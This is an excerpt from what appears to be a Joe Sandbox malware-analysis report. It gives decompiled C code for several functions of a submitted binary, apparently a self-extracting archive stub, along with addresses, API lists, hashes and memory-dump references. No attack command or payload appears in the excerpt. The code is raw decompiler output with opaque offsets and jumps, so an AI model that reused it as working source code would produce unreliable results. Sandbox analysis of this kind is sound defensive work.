                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                        • String ID:
                                                        • API String ID: 806969131-0
                                                        • Opcode ID: d62fa994b8d3b5fe67d986d13680924e99530adf68fd7c8083f8de226427157e
                                                        • Instruction ID: 1b9d3fa3f06d2399c37eeb77cc4ee22d2a10dfa5abccb19227bf7e1dccef1f84
                                                        • Opcode Fuzzy Hash: d62fa994b8d3b5fe67d986d13680924e99530adf68fd7c8083f8de226427157e
                                                        • Instruction Fuzzy Hash: 77D02335544770341C04B77D3D03789235428527783A10B75F710CB1D1FF1480016311
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A1DF2E Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 30%
                                                        			E00A1DF2E(void* __ecx, void* __esi) {
				signed int _v8;
				void* _t5;
				intOrPtr _t8;
				signed int _t9;
				void* _t16;
				void* _t20;
				signed int _t26;

				_t20 = __esi;
				_t16 = __ecx;
				if(( *0xa35560 & 0x00001000) == 0) {
					return _t5;
				} else {
					E00A1DFDD(__ecx, __esi);
					_t8 =  *0xa60ce0 + 1;
					 *0xa60ce0 = _t8;
					if(_t8 == 1) {
						E00A1E12F(4, 0xa60ce4); // executed
					}
					_t24 = _t26;
					_push(_t16);
					_t9 =  *0xa3e668; // 0xcba178b4
					_v8 = _t9 ^ _t26;
					if(E00A1DF61() == 0) {
						 *0xa60cdc = 0;
					} else {
						 *0xa33260(0xa60cdc, _t20);
						 *((intOrPtr*)( *0xa60cd8))();
					}
					return E00A1EEFA(_v8 ^ _t24);
				}
			}










                                                        0x00a1df2e
                                                        0x00a1df2e
                                                        0x00a1df38
                                                        0x00a1df60
                                                        0x00a1df3a
                                                        0x00a1df3a
                                                        0x00a1df44
                                                        0x00a1df45
                                                        0x00a1df4d
                                                        0x00a1df56
                                                        0x00a1df56
                                                        0x00a1e1da
                                                        0x00a1e1dc
                                                        0x00a1e1dd
                                                        0x00a1e1e4
                                                        0x00a1e1ee
                                                        0x00a1e209
                                                        0x00a1e1f0
                                                        0x00a1e1fe
                                                        0x00a1e204
                                                        0x00a1e206
                                                        0x00a1e220
                                                        0x00a1e220

                                                        APIs
                                                        • DloadLock.DELAYIMP ref: 00A1DF3A
                                                        • DloadProtectSection.DELAYIMP ref: 00A1DF56
                                                          • Part of subcall function 00A1E12F: DloadObtainSection.DELAYIMP ref: 00A1E13F
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Dload$Section$LockObtainProtect
                                                        • String ID:
                                                        • API String ID: 731663317-0
                                                        • Opcode ID: 9928076d1baee0a2a4821c2a179a7cbf67c0af3f91e41176cf820b7a793c6536
                                                        • Instruction ID: 0b90610253b7d2d7d57b4410024e986949a9a84edee7cd10bd4959c33cfa5b76
                                                        • Opcode Fuzzy Hash: 9928076d1baee0a2a4821c2a179a7cbf67c0af3f91e41176cf820b7a793c6536
                                                        • Instruction Fuzzy Hash: 50D012305042546AC301E7A89E46BD922B0B714344F600B05FA06D21A0CFB056C3C601
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A012E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 58%
                                                        			E00A012E6(struct HWND__* _a4, int _a8, signed char _a12) {
				int _t8;

				asm("sbb eax, eax");
				_t8 = ShowWindow(GetDlgItem(_a4, _a8),  ~(_a12 & 0x000000ff) & 0x00000009); // executed
				return _t8;
			}




                                                        0x00a012ed
                                                        0x00a01302
                                                        0x00a01308

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ItemShowWindow
                                                        • String ID:
                                                        • API String ID: 3351165006-0
                                                        • Opcode ID: b329ffb4698143957dd9a12fb15176d9b82b8b1d2f310b5f524c16b2c75fd25e
                                                        • Instruction ID: 4cbe379f1da05669544eaf671426b1427e8d8c27b26b73a6ef701dd24df2304c
                                                        • Opcode Fuzzy Hash: b329ffb4698143957dd9a12fb15176d9b82b8b1d2f310b5f524c16b2c75fd25e
                                                        • Instruction Fuzzy Hash: 98C0123205C600BECB018BB0DC19E2FBBB8ABA6212F00CA08F2A5C00A0C238C010DB11
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A019C6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 60%
                                                        			E00A019C6(intOrPtr* __ecx, void* __edx) {
				void* __esi;
				signed int _t103;
				intOrPtr _t107;
				signed int _t109;
				signed int _t111;
				signed int _t115;
				signed int _t116;
				signed int _t127;
				intOrPtr _t128;
				char _t129;
				char _t140;
				intOrPtr _t146;
				signed int _t147;
				signed int _t148;
				void* _t151;
				signed int _t156;
				signed int _t160;
				void* _t165;
				void* _t167;
				void* _t171;
				intOrPtr* _t172;
				intOrPtr* _t174;
				signed int _t184;
				void* _t185;
				signed int _t187;
				char* _t202;
				intOrPtr _t203;
				signed int _t204;
				void* _t213;
				void* _t214;
				void* _t215;
				void* _t217;
				char* _t218;
				intOrPtr _t219;
				void* _t220;
				void* _t227;
				void* _t229;

				_t213 = __edx;
				_t174 = __ecx;
				E00A1E554(E00A31F93, _t229);
				_t172 = _t174;
				_t215 = _t172 + 0x21f8;
				 *((char*)(_t172 + 0x6cbc)) = 0;
				 *((char*)(_t172 + 0x6cc4)) = 0;
				 *0xa33260(_t215, 7, _t214, _t220, _t171);
				if( *( *( *_t172 + 0xc))() == 7) {
					_t222 = 0;
					 *(_t172 + 0x6cc0) = 0;
					_t103 = E00A01DC8(_t215, 7);
					__eflags = _t103;
					if(_t103 == 0) {
						E00A01380(_t229 - 0x38, 0x200000);
						 *(_t229 - 4) = 0;
						 *0xa33260();
						_t107 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
						 *((intOrPtr*)(_t229 - 0x18)) = _t107;
						 *0xa33260( *((intOrPtr*)(_t229 - 0x38)),  *((intOrPtr*)(_t229 - 0x34)) + 0xfffffff0);
						_t109 =  *( *_t172 + 0xc)();
						_t184 = _t109;
						_t222 = 0;
						 *(_t229 - 0x14) = _t184;
						__eflags = _t184;
						if(_t184 <= 0) {
							L22:
							__eflags =  *(_t172 + 0x6cc0);
							_t185 = _t229 - 0x38;
							if( *(_t172 + 0x6cc0) != 0) {
								_t35 = _t229 - 4; // executed
								 *_t35 =  *(_t229 - 4) | 0xffffffff;
								__eflags =  *_t35;
								E00A015C2(_t185); // executed
								L25:
								_t111 =  *(_t172 + 0x6cb0);
								__eflags = _t111 - 4;
								if(__eflags != 0) {
									__eflags = _t111 - 3;
									if(_t111 != 3) {
										 *((intOrPtr*)(_t172 + 0x2200)) = 7;
										L32:
										 *((char*)(_t229 - 0xd)) = 0;
										__eflags = E00A03A31(_t172, _t213, _t222);
										 *(_t229 - 0xe) = 0;
										__eflags = 0 - 1;
										if(0 != 1) {
											L38:
											_t115 =  *((intOrPtr*)(_t229 - 0xd));
											L39:
											_t187 =  *((intOrPtr*)(_t172 + 0x6cc5));
											__eflags = _t187;
											if(_t187 == 0) {
												L41:
												__eflags =  *((char*)(_t172 + 0x6cc4));
												if( *((char*)(_t172 + 0x6cc4)) != 0) {
													L43:
													__eflags = _t187;
													if(__eflags == 0) {
														E00A06D41(__eflags, 0x1b, _t172 + 0x24);
													}
													__eflags =  *((char*)(_t229 + 8));
													if( *((char*)(_t229 + 8)) == 0) {
														goto L1;
													} else {
														L46:
														__eflags =  *(_t229 - 0xe);
														 *((char*)(_t172 + 0x6cb6)) =  *((intOrPtr*)(_t172 + 0x2224));
														if( *(_t229 - 0xe) == 0) {
															L68:
															__eflags =  *((char*)(_t172 + 0x6cb5));
															if( *((char*)(_t172 + 0x6cb5)) == 0) {
																L70:
																E00A10131(_t172 + 0x6cfa, _t172 + 0x24, 0x800);
																L71:
																_t116 = 1;
																L72:
																 *[fs:0x0] =  *((intOrPtr*)(_t229 - 0xc));
																return _t116;
															}
															__eflags =  *((char*)(_t172 + 0x6cb9));
															if( *((char*)(_t172 + 0x6cb9)) == 0) {
																goto L71;
															}
															goto L70;
														}
														__eflags =  *((char*)(_t172 + 0x21e0));
														if( *((char*)(_t172 + 0x21e0)) == 0) {
															L49:
															 *0xa33260();
															_t227 =  *((intOrPtr*)( *((intOrPtr*)( *_t172 + 0x14))))();
															_t217 = _t213;
															 *((intOrPtr*)(_t229 - 0x18)) =  *((intOrPtr*)(_t172 + 0x6ca0));
															 *(_t229 - 0x14) =  *(_t172 + 0x6ca4);
															 *((intOrPtr*)(_t229 - 0x1c)) =  *((intOrPtr*)(_t172 + 0x6ca8));
															 *((intOrPtr*)(_t229 - 0x20)) =  *((intOrPtr*)(_t172 + 0x6cac));
															 *((intOrPtr*)(_t229 - 0x24)) =  *((intOrPtr*)(_t172 + 0x21dc));
															while(1) {
																_t127 = E00A03A31(_t172, _t213, _t227);
																__eflags = _t127;
																if(_t127 == 0) {
																	break;
																}
																_t128 =  *((intOrPtr*)(_t172 + 0x21dc));
																__eflags = _t128 - 3;
																if(_t128 != 3) {
																	__eflags = _t128 - 2;
																	if(_t128 == 2) {
																		__eflags =  *((char*)(_t172 + 0x6cb5));
																		if( *((char*)(_t172 + 0x6cb5)) == 0) {
																			L65:
																			_t129 = 0;
																			__eflags = 0;
																			L66:
																			 *((char*)(_t172 + 0x6cb9)) = _t129;
																			L67:
																			 *((intOrPtr*)(_t172 + 0x6ca0)) =  *((intOrPtr*)(_t229 - 0x18));
																			 *(_t172 + 0x6ca4) =  *(_t229 - 0x14);
																			 *((intOrPtr*)(_t172 + 0x6ca8)) =  *((intOrPtr*)(_t229 - 0x1c));
																			 *((intOrPtr*)(_t172 + 0x6cac)) =  *((intOrPtr*)(_t229 - 0x20));
																			 *((intOrPtr*)(_t172 + 0x21dc)) =  *((intOrPtr*)(_t229 - 0x24));
																			 *0xa33260(_t227, _t217, 0);
																			 *( *( *_t172 + 0x10))();
																			goto L68;
																		}
																		__eflags =  *((char*)(_t172 + 0x3318));
																		if( *((char*)(_t172 + 0x3318)) != 0) {
																			goto L65;
																		}
																		_t129 = 1;
																		goto L66;
																	}
																	__eflags = _t128 - 5;
																	if(_t128 == 5) {
																		goto L67;
																	}
																	L59:
																	E00A01EFA(_t172);
																	continue;
																}
																__eflags =  *((char*)(_t172 + 0x6cb5));
																if( *((char*)(_t172 + 0x6cb5)) == 0) {
																	L55:
																	_t140 = 0;
																	__eflags = 0;
																	L56:
																	 *((char*)(_t172 + 0x6cb9)) = _t140;
																	goto L59;
																}
																__eflags =  *((char*)(_t172 + 0x5668));
																if( *((char*)(_t172 + 0x5668)) != 0) {
																	goto L55;
																}
																_t140 = 1;
																goto L56;
															}
															goto L67;
														}
														__eflags =  *((char*)(_t172 + 0x6cbc));
														if( *((char*)(_t172 + 0x6cbc)) != 0) {
															goto L68;
														}
														goto L49;
													}
												}
												__eflags = _t115;
												if(_t115 != 0) {
													goto L46;
												}
												goto L43;
											}
											__eflags =  *((char*)(_t229 + 8));
											if( *((char*)(_t229 + 8)) == 0) {
												goto L1;
											}
											goto L41;
										}
										__eflags = 0;
										 *((char*)(_t229 - 0xd)) = 0;
										while(1) {
											E00A01EFA(_t172);
											_t146 =  *((intOrPtr*)(_t172 + 0x21dc));
											__eflags = _t146 - 1;
											if(_t146 == 1) {
												break;
											}
											__eflags =  *((char*)(_t172 + 0x21e0));
											if( *((char*)(_t172 + 0x21e0)) == 0) {
												L37:
												_t147 = E00A03A31(_t172, _t213, _t222);
												__eflags = _t147;
												_t148 = _t147 & 0xffffff00 | _t147 != 0x00000000;
												 *(_t229 - 0xe) = _t148;
												__eflags = _t148 - 1;
												if(_t148 == 1) {
													continue;
												}
												goto L38;
											}
											__eflags = _t146 - 4;
											if(_t146 == 4) {
												break;
											}
											goto L37;
										}
										_t115 = 1;
										goto L39;
									}
									_t218 = _t172 + 0x21ff;
									_t222 =  *( *_t172 + 0xc);
									 *0xa33260(_t218, 1);
									_t151 =  *( *( *_t172 + 0xc))();
									__eflags = _t151 - 1;
									if(_t151 != 1) {
										goto L1;
									}
									__eflags =  *_t218;
									if( *_t218 != 0) {
										goto L1;
									}
									 *((intOrPtr*)(_t172 + 0x2200)) = 8;
									goto L32;
								}
								E00A06D41(__eflags, 0x3c, _t172 + 0x24);
								goto L1;
							}
							E00A015C2(_t185);
							goto L1;
						} else {
							goto L6;
						}
						do {
							L6:
							_t202 =  *((intOrPtr*)(_t229 - 0x38)) + _t222;
							__eflags =  *_t202 - 0x52;
							if( *_t202 != 0x52) {
								goto L17;
							}
							_t156 = E00A01DC8(_t202, _t109 - _t222);
							__eflags = _t156;
							if(_t156 == 0) {
								L16:
								_t109 =  *(_t229 - 0x14);
								goto L17;
							}
							_t203 =  *((intOrPtr*)(_t229 - 0x18));
							 *(_t172 + 0x6cb0) = _t156;
							__eflags = _t156 - 1;
							if(_t156 != 1) {
								L19:
								_t204 = _t203 + _t222;
								 *(_t172 + 0x6cc0) = _t204;
								_t222 =  *( *_t172 + 0x10);
								 *0xa33260(_t204, 0, 0);
								 *( *( *_t172 + 0x10))();
								_t160 =  *(_t172 + 0x6cb0);
								__eflags = _t160 - 2;
								if(_t160 == 2) {
									L21:
									_t222 =  *( *_t172 + 0xc);
									 *0xa33260(_t215, 7);
									 *( *( *_t172 + 0xc))();
									goto L22;
								}
								__eflags = _t160 - 3;
								if(_t160 != 3) {
									goto L22;
								}
								goto L21;
							}
							__eflags = _t222;
							if(_t222 <= 0) {
								goto L19;
							}
							__eflags = _t203 - 0x1c;
							if(_t203 >= 0x1c) {
								goto L19;
							}
							__eflags =  *(_t229 - 0x14) - 0x1f;
							if( *(_t229 - 0x14) <= 0x1f) {
								goto L19;
							}
							_t165 =  *((intOrPtr*)(_t229 - 0x38)) - _t203;
							__eflags =  *((char*)(_t165 + 0x1c)) - 0x52;
							if( *((char*)(_t165 + 0x1c)) != 0x52) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1d)) - 0x53;
							if( *((char*)(_t165 + 0x1d)) != 0x53) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1e)) - 0x46;
							if( *((char*)(_t165 + 0x1e)) != 0x46) {
								goto L16;
							}
							__eflags =  *((char*)(_t165 + 0x1f)) - 0x58;
							if( *((char*)(_t165 + 0x1f)) == 0x58) {
								goto L19;
							}
							goto L16;
							L17:
							_t222 = _t222 + 1;
							__eflags = _t222 - _t109;
						} while (_t222 < _t109);
						goto L22;
					}
					 *(_t172 + 0x6cb0) = _t103;
					__eflags = _t103 - 1;
					if(_t103 == 1) {
						_t219 =  *_t172;
						_t222 =  *(_t219 + 0x14);
						 *0xa33260(0);
						_t167 =  *( *(_t219 + 0x14))();
						asm("sbb edx, 0x0");
						 *0xa33260(_t167 - 7, _t213);
						 *((intOrPtr*)(_t219 + 0x10))();
					}
					goto L25;
				}
				L1:
				_t116 = 0;
				goto L72;
			}








































                                                        0x00a019c6
                                                        0x00a019c6
                                                        0x00a019cb
                                                        0x00a019d4
                                                        0x00a019dc
                                                        0x00a019e3
                                                        0x00a019ea
                                                        0x00a019f6
                                                        0x00a01a03
                                                        0x00a01a0e
                                                        0x00a01a11
                                                        0x00a01a17
                                                        0x00a01a1c
                                                        0x00a01a1e
                                                        0x00a01a64
                                                        0x00a01a6b
                                                        0x00a01a73
                                                        0x00a01a7b
                                                        0x00a01a89
                                                        0x00a01a8f
                                                        0x00a01a97
                                                        0x00a01a9a
                                                        0x00a01a9c
                                                        0x00a01a9e
                                                        0x00a01aa1
                                                        0x00a01aa3
                                                        0x00a01b46
                                                        0x00a01b46
                                                        0x00a01b4d
                                                        0x00a01b50
                                                        0x00a01b5c
                                                        0x00a01b5c
                                                        0x00a01b5c
                                                        0x00a01b60
                                                        0x00a01b65
                                                        0x00a01b65
                                                        0x00a01b6b
                                                        0x00a01b6e
                                                        0x00a01b80
                                                        0x00a01b83
                                                        0x00a01bbd
                                                        0x00a01bc7
                                                        0x00a01bcb
                                                        0x00a01bd3
                                                        0x00a01bd8
                                                        0x00a01bdb
                                                        0x00a01bdd
                                                        0x00a01c1f
                                                        0x00a01c1f
                                                        0x00a01c22
                                                        0x00a01c22
                                                        0x00a01c28
                                                        0x00a01c2a
                                                        0x00a01c36
                                                        0x00a01c36
                                                        0x00a01c3d
                                                        0x00a01c43
                                                        0x00a01c43
                                                        0x00a01c45
                                                        0x00a01c4d
                                                        0x00a01c4d
                                                        0x00a01c52
                                                        0x00a01c56
                                                        0x00000000
                                                        0x00a01c5c
                                                        0x00a01c5c
                                                        0x00a01c5c
                                                        0x00a01c66
                                                        0x00a01c6c
                                                        0x00a01d7e
                                                        0x00a01d7e
                                                        0x00a01d85
                                                        0x00a01d90
                                                        0x00a01da0
                                                        0x00a01da5
                                                        0x00a01da5
                                                        0x00a01da7
                                                        0x00a01dad
                                                        0x00a01db7
                                                        0x00a01db7
                                                        0x00a01d87
                                                        0x00a01d8e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01d8e
                                                        0x00a01c72
                                                        0x00a01c79
                                                        0x00a01c88
                                                        0x00a01c8f
                                                        0x00a01c99
                                                        0x00a01c9b
                                                        0x00a01ca3
                                                        0x00a01cac
                                                        0x00a01cb5
                                                        0x00a01cbe
                                                        0x00a01cc7
                                                        0x00a01d10
                                                        0x00a01d12
                                                        0x00a01d17
                                                        0x00a01d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01cd3
                                                        0x00a01cd9
                                                        0x00a01cdc
                                                        0x00a01cff
                                                        0x00a01d02
                                                        0x00a01d1d
                                                        0x00a01d24
                                                        0x00a01d34
                                                        0x00a01d34
                                                        0x00a01d34
                                                        0x00a01d36
                                                        0x00a01d36
                                                        0x00a01d3c
                                                        0x00a01d3f
                                                        0x00a01d48
                                                        0x00a01d51
                                                        0x00a01d5a
                                                        0x00a01d63
                                                        0x00a01d74
                                                        0x00a01d7c
                                                        0x00000000
                                                        0x00a01d7c
                                                        0x00a01d26
                                                        0x00a01d2d
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01d31
                                                        0x00000000
                                                        0x00a01d31
                                                        0x00a01d04
                                                        0x00a01d07
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01d09
                                                        0x00a01d0b
                                                        0x00000000
                                                        0x00a01d0b
                                                        0x00a01cde
                                                        0x00a01ce5
                                                        0x00a01cf5
                                                        0x00a01cf5
                                                        0x00a01cf5
                                                        0x00a01cf7
                                                        0x00a01cf7
                                                        0x00000000
                                                        0x00a01cf7
                                                        0x00a01ce7
                                                        0x00a01cee
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01cf2
                                                        0x00000000
                                                        0x00a01cf2
                                                        0x00000000
                                                        0x00a01d1b
                                                        0x00a01c7b
                                                        0x00a01c82
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01c82
                                                        0x00a01c56
                                                        0x00a01c3f
                                                        0x00a01c41
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01c41
                                                        0x00a01c2c
                                                        0x00a01c30
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01c30
                                                        0x00a01bdf
                                                        0x00a01be1
                                                        0x00a01be4
                                                        0x00a01be6
                                                        0x00a01beb
                                                        0x00a01bf1
                                                        0x00a01bf4
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01bfa
                                                        0x00a01c01
                                                        0x00a01c0c
                                                        0x00a01c0e
                                                        0x00a01c13
                                                        0x00a01c15
                                                        0x00a01c18
                                                        0x00a01c1b
                                                        0x00a01c1d
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01c1d
                                                        0x00a01c03
                                                        0x00a01c06
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01c06
                                                        0x00a01ccc
                                                        0x00000000
                                                        0x00a01ccc
                                                        0x00a01b87
                                                        0x00a01b90
                                                        0x00a01b95
                                                        0x00a01b9d
                                                        0x00a01b9f
                                                        0x00a01ba2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01ba8
                                                        0x00a01bab
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01bb1
                                                        0x00000000
                                                        0x00a01bb1
                                                        0x00a01b76
                                                        0x00000000
                                                        0x00a01b76
                                                        0x00a01b52
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01aa9
                                                        0x00a01aa9
                                                        0x00a01aac
                                                        0x00a01aae
                                                        0x00a01ab1
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01ab7
                                                        0x00a01abc
                                                        0x00a01abe
                                                        0x00a01afa
                                                        0x00a01afa
                                                        0x00000000
                                                        0x00a01afa
                                                        0x00a01ac0
                                                        0x00a01ac3
                                                        0x00a01ac9
                                                        0x00a01acc
                                                        0x00a01b04
                                                        0x00a01b06
                                                        0x00a01b0c
                                                        0x00a01b12
                                                        0x00a01b18
                                                        0x00a01b20
                                                        0x00a01b22
                                                        0x00a01b28
                                                        0x00a01b2b
                                                        0x00a01b32
                                                        0x00a01b37
                                                        0x00a01b3c
                                                        0x00a01b44
                                                        0x00000000
                                                        0x00a01b44
                                                        0x00a01b2d
                                                        0x00a01b30
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01b30
                                                        0x00a01ace
                                                        0x00a01ad0
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01ad2
                                                        0x00a01ad5
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01ad7
                                                        0x00a01adb
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01ae0
                                                        0x00a01ae2
                                                        0x00a01ae6
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01ae8
                                                        0x00a01aec
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01aee
                                                        0x00a01af2
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01af4
                                                        0x00a01af8
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00a01afd
                                                        0x00a01afd
                                                        0x00a01afe
                                                        0x00a01afe
                                                        0x00000000
                                                        0x00a01b02
                                                        0x00a01a20
                                                        0x00a01a26
                                                        0x00a01a29
                                                        0x00a01a2f
                                                        0x00a01a32
                                                        0x00a01a37
                                                        0x00a01a3f
                                                        0x00a01a47
                                                        0x00a01a4c
                                                        0x00a01a54
                                                        0x00a01a54
                                                        0x00000000
                                                        0x00a01a29
                                                        0x00a01a05
                                                        0x00a01a05
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: H_prolog
                                                        • String ID:
                                                        • API String ID: 3519838083-0
                                                        • Opcode ID: e0bd04b8334100b358e77633f9d8f34bf54cf7f42212c81491fe64c16c802940
                                                        • Instruction ID: 27ce8ca159a38f853f9450e25517f54bd5fa34583b35aec756d87506cd70847f
                                                        • Opcode Fuzzy Hash: e0bd04b8334100b358e77633f9d8f34bf54cf7f42212c81491fe64c16c802940
                                                        • Instruction Fuzzy Hash: 57C1B070A042489FEF15DF68D884BE97BE5EF1A310F0844B9EC469F2C6CB759944CBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A03AC2 Relevance: 1.7, APIs: 1, Instructions: 176COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 90%
                                                        			E00A03AC2(void* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				char _t76;
				signed int _t83;
				intOrPtr _t94;
				void* _t120;
				char _t121;
				void* _t123;
				void* _t130;
				signed int _t144;
				signed int _t148;
				void* _t151;
				void* _t153;

				_t143 = __edx;
				_t123 = __ecx;
				E00A1E554(E00A31FF0, _t153);
				E00A1E630();
				_t151 = _t123;
				_t156 =  *((char*)(_t151 + 0x6cc4));
				if( *((char*)(_t151 + 0x6cc4)) == 0) {
					__eflags =  *((char*)(_t151 + 0x45f0)) - 5;
					if(__eflags > 0) {
						L26:
						E00A06D41(__eflags, 0x1e, _t151 + 0x24);
						goto L27;
					}
					__eflags =  *((intOrPtr*)(_t151 + 0x6cb0)) - 3;
					__eflags =  *((intOrPtr*)(_t151 + 0x45ec)) - ((0 |  *((intOrPtr*)(_t151 + 0x6cb0)) != 0x00000003) - 0x00000001 & 0x00000015) + 0x1d;
					if(__eflags > 0) {
						goto L26;
					}
					_t83 =  *(_t151 + 0x5628) |  *(_t151 + 0x562c);
					__eflags = _t83;
					if(_t83 != 0) {
						L7:
						_t120 = _t151 + 0x20e8;
						E00A0CB2A(_t83, _t120);
						_push(_t120);
						E00A11B92(_t153 - 0xe6ec, __eflags); // executed
						_t121 = 0;
						_push(0);
						 *((intOrPtr*)(_t153 - 4)) = 0;
						E00A12E9E(0, _t153 - 0xe6ec, _t153,  *((intOrPtr*)(_t151 + 0x56c4)));
						_t148 =  *(_t153 + 8);
						__eflags =  *(_t153 + 0xc);
						if( *(_t153 + 0xc) != 0) {
							L15:
							__eflags =  *((intOrPtr*)(_t151 + 0x566b)) - _t121;
							if( *((intOrPtr*)(_t151 + 0x566b)) == _t121) {
								L18:
								E00A0AC78(_t151 + 0x21a0, _t143,  *((intOrPtr*)(_t151 + 0x5640)), 1);
								 *(_t151 + 0x2108) =  *(_t151 + 0x5628);
								 *(_t151 + 0x210c) =  *(_t151 + 0x562c);
								 *((char*)(_t151 + 0x2110)) = _t121;
								E00A0CBDD(_t151 + 0x20e8, _t151,  *(_t153 + 0xc));
								_t130 = _t151 + 0x20e8;
								 *((char*)(_t151 + 0x2111)) =  *((intOrPtr*)(_t153 + 0x10));
								 *((char*)(_t151 + 0x2137)) =  *((intOrPtr*)(_t151 + 0x5669));
								 *((intOrPtr*)(_t130 + 0x38)) = _t151 + 0x45d0;
								 *((intOrPtr*)(_t130 + 0x3c)) = _t121;
								_t94 =  *((intOrPtr*)(_t151 + 0x5630));
								_t144 =  *(_t151 + 0x5634);
								 *((intOrPtr*)(_t153 - 0x9aa4)) = _t94;
								 *(_t153 - 0x9aa0) = _t144;
								 *((char*)(_t153 - 0x9a8c)) = _t121;
								__eflags =  *((intOrPtr*)(_t151 + 0x45f0)) - _t121;
								if(__eflags != 0) {
									E00A12B4D(_t153 - 0xe6ec,  *((intOrPtr*)(_t151 + 0x45ec)), _t121);
								} else {
									_push(_t144);
									_push(_t94);
									_push(_t130); // executed
									E00A09477(_t121, _t144, _t148, __eflags); // executed
								}
								asm("sbb edx, edx");
